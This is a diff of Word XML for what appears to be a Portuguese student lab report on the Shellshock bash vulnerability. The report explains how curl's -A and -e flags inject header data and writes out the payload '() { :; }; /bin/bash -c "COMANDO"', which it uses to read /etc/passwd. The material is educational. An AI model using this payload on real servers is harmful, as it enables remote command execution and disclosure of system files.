+        <w:t>browser</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> ou através da ferramenta </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2319,9 +2555,15 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> Data to </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>Curl</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, o servidor guarda certas informações presentes no </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2329,9 +2571,60 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>Bash</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>header</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> do pedido </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>em</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> variáve</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>is</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> de ambiente.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Para manipular o conteúdo enviado no </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2339,9 +2632,15 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> via </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>header</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> do pedido </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2349,9 +2648,15 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>Environment</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>HTTP</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> foi usada a ferramenta </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2359,9 +2664,15 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>Curl</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. Através desta ferramenta descobrimos que se passarmos informação no </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2369,17 +2680,15 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>Variable</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">” para explorar esta vulnerabilidade do programa </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>header</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> usando as </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2387,252 +2696,8 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>bash</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> o atacante precisa de passar a sua informação ao programa </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>bash</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> através de variáveis de ambiente.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Quando um pedido </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>HTTP</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> é enviado ao servidor</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, através do </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>browser</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> ou através da ferramenta </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Curl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, o servidor guarda certas informações presentes no </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>header</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> do pedido </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>em</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> variáve</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>is</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> de ambiente.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Para manipular o conteúdo enviado no </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>header</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> do pedido </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>HTTP</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> foi usada a ferramenta </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>Curl</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">. Através desta ferramenta descobrimos que se passarmos informação no </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>header</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> usando as </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
         <w:t>flags</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2659,25 +2724,8 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>A :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> modifica o parâmetro </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t xml:space="preserve">-A : modifica o parâmetro </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2687,7 +2735,6 @@
         </w:rPr>
         <w:t>User_Agent</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2695,7 +2742,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> do </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2703,17 +2749,7 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>header</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>;</w:t>
+        <w:t>header;</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2734,23 +2770,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>-</w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>e :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> modifica o parâmetro </w:t>
+        <w:t xml:space="preserve">-e : modifica o parâmetro </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2768,7 +2788,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> no </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2776,9 +2795,39 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>header</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>header;</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:ind w:firstLine="360"/>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t>A</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> informação</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> passada usando estas </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2786,50 +2835,8 @@
           <w:iCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t>;</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:ind w:firstLine="360"/>
-        <w:jc w:val="both"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>A</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> informação</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> passada usando estas </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:i/>
-          <w:iCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
         <w:t>flags</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2901,7 +2908,7 @@
           <w:lang w:val="pt-PT"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="4" w:name="_Toc213009131"/>
+      <w:bookmarkStart w:id="4" w:name="_Toc213030672"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -2939,39 +2946,7 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve"> obtemos o conteúdo do ficheiro /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>passwd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve">? (alínea 2a). </w:t>
+        <w:t xml:space="preserve"> obtemos o conteúdo do ficheiro /etc/passwd? (alínea 2a). </w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2990,7 +2965,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Para obter a informação temos de fazer com que a variável de ambiente seja interpretada como uma função, ou seja, o conteúdo do </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3000,7 +2974,6 @@
         </w:rPr>
         <w:t>header</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3038,47 +3011,7 @@
           <w:bCs/>
           <w:lang w:val="pt-PT"/>
         </w:rPr>
-        <w:t xml:space="preserve">() </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>{ :</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>; }; /bin/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>bash</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:b/>
-          <w:bCs/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> -c “COMANDO”</w:t>
+        <w:t>() { :; }; /bin/bash -c “COMANDO”</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -3268,7 +3201,6 @@
         </w:rPr>
         <w:t xml:space="preserve">Na figura 3, é possível observar o uso da </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3278,7 +3210,6 @@
         </w:rPr>
         <w:t>flag</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3286,7 +3217,6 @@
         </w:rPr>
         <w:t xml:space="preserve"> -A e do formato do </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3296,47 +3226,13 @@
         </w:rPr>
         <w:t>header</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> indicado anteriormente, para apresentar o conteúdo do ficheiro /</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t>passwd</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:lang w:val="pt-PT"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> e para listar a pasta em que o programa se encontra. A </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:lang w:val="pt-PT"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> indicado anteriormente, para apresentar o conteúdo do ficheiro /etc/passwd e para listar a pasta em que o programa se encontra. A </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3346,7 +3242,6 @@
         </w:rPr>
         <w:t>flag</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -3370,6 +3265,7 @@
           <w:noProof/>
           <w:lang w:val="pt-PT"/>
